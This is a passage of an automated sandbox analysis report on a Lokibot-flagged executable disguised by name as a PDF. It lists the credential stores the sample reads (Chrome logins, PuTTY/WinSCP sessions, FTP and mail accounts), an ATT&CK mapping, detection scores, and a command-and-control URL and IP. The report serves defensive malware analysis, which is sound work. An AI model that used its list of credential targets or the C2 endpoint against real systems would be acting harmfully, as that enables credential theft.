              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00406069 GetUserNameW,1_2_00406069
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572, type: MEMORY
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: PopPassword1_2_0040D069
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: SmtpPassword1_2_0040D069
              Source: Yara matchFile source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572, type: MEMORY
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PI_Nov9071011998_ENTRUSTpdf.exe20%VirustotalBrowse
              PI_Nov9071011998_ENTRUSTpdf.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              webtex.ga4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cn/90%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/jp/JT0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/eT0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/eT0%Avira URL Cloudsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.founder.com.cn/cnpro0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/WTa0%Avira URL Cloudsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/$T0%Avira URL Cloudsafe
              http://webtex.ga/ibiki/gate.php0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y0-d0%Avira URL Cloudsafe
              http://www.fontbureau.como0%URL Reputationsafe
              http://www.fontbureau.como0%URL Reputationsafe
              http://www.fontbureau.como0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.founder.com.cn/cnac80%Avira URL Cloudsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/3T0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              webtex.ga
              		47.91.79.163
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://webtex.ga/ibiki/gate.phptrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                		high
                http://www.fontbureau.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/9PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/jp/JTPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers/?PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bThePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/jp/eTPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225373707.0000000005F68000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/eTPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designers?PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                        		high
                        http://www.ibsensoftware.com/PI_Nov9071011998_ENTRUSTpdf.exe, PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.tiro.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          		high
                          http://www.goodfont.co.krPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/jp/PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comaPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnproPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224342922.0000000005F71000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/WTaPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.carterandcone.comlPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/cThePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/sPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225166450.0000000005F63000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225636033.0000000005F6A000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0/PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/$TPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0-dPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comoPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleasePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cnac8PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fonts.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleasePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.sakkal.comPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/3TPI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    47.91.79.163
                                    		unknownUnited States
                                    		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:326333
                                    Start date:03.12.2020
                                    Start time:10:01:23
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 37s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:PI_Nov9071011998_ENTRUSTpdf.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:24
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@3/3@302/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 6.8% (good quality ratio 6.5%)
                                    • Quality average: 77.2%
                                    • Quality standard deviation: 28.5%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 63
                                    • Number of non-executed functions: 6
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 52.255.188.83, 92.122.144.200, 51.104.139.180, 40.88.32.150, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    10:02:24API Interceptor312x Sleep call for process: PI_Nov9071011998_ENTRUSTpdf.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    47.91.79.163AD_02207658190080.xlsxGet hashmaliciousBrowse
                                    • webtex.ga/rojas/gate.php
                                    3aMqc1R0cU.exeGet hashmaliciousBrowse
                                    • webtex.ga/rojas/gate.php

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    webtex.gaAD_02207658190080.xlsxGet hashmaliciousBrowse
                                    • 47.91.79.163
                                    3aMqc1R0cU.exeGet hashmaliciousBrowse
                                    • 47.91.79.163

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCAD_02207658190080.xlsxGet hashmaliciousBrowse
                                    • 47.91.79.163
                                    Shipment Document BL,INV and packing list.jpg.exeGet hashmaliciousBrowse
                                    • 161.117.47.123
                                    UqjZpY9ltr.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    UqjZpY9ltr.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    UqjZpY9ltr.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    3aMqc1R0cU.exeGet hashmaliciousBrowse
                                    • 47.91.79.163
                                    https://bit.ly/2URoZs9Get hashmaliciousBrowse
                                    • 8.208.98.199
                                    http://findwfriends.net.htGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    https://bit.ly/33btgvfGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    https://www.dropbox.com/s/5vgml9mqmjffp3n/Note%207V1N0UE.doc?dl=1Get hashmaliciousBrowse
                                    • 47.244.28.71
                                    B3CcRRb6nV.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    http://h5fmt.info/mHNeigecrLGet hashmaliciousBrowse
                                    • 8.210.144.46
